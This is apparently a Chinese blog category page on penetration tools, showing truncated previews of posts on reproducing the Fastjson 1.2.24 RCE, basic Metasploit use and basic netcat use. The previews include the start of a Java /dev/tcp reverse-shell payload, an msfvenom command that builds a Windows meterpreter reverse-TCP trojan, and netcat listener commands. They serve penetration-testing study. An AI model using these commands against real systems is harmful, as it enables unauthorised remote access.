
渗透工具
文章平均质量分 67
L无所不能
这个作者很懒,什么都没留下…
展开
-
Fastjson1.2.24RCE漏洞复现
1.启动环境并且访问2.下载marshalsec-0.0.3-SNAPSHOT-all.jar3.新建Shell.java文件import java.lang.Runtime;import java.lang.Process;public class shell{static {try {Runtime rt = Runtime.getRuntime();String[] commands = {“/bin/bash”,“-c”,“exec 5<>/dev/tcp/192.原创 2022-05-18 17:47:39 · 1310 阅读 · 0 评论 -
msf的基础使用
Msf1.msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=5555 -f exe x>123.exe 生成木马 -a选择架构 -f输出文件格式 -o文件输出 windows/meterpreter/reverse_tcp 攻击载荷 LHOST=192.168.1.109 本机地址 LPORT=5555 端口号2.msfconsole 启动msf3.use exploit/multi原创 2020-08-31 13:44:54 · 339 阅读 · 0 评论 -
nc的基础使用
1.Nc之间的通讯:主机A nc端输入:nc -l -p 333 (-l 处于监听状态,也就是监听333 端口 老版本需要加-p参数)主机B nc 端输入:nc -nv 192.168.1.3 333 (此处ip为主机A的ip建立连接 n表示不要使用DNS 反向查询ip地址的域名 v 表示详细输出)2.Nc 之间传输文件主机A nc 发送端输入 nc -l -p 9992 < 1.txt主机B nc 下载端输入 nc 192.168.110.1 9992 > 1.txt3.NC 反弹原创 2020-08-31 13:42:15 · 585 阅读 · 1 评论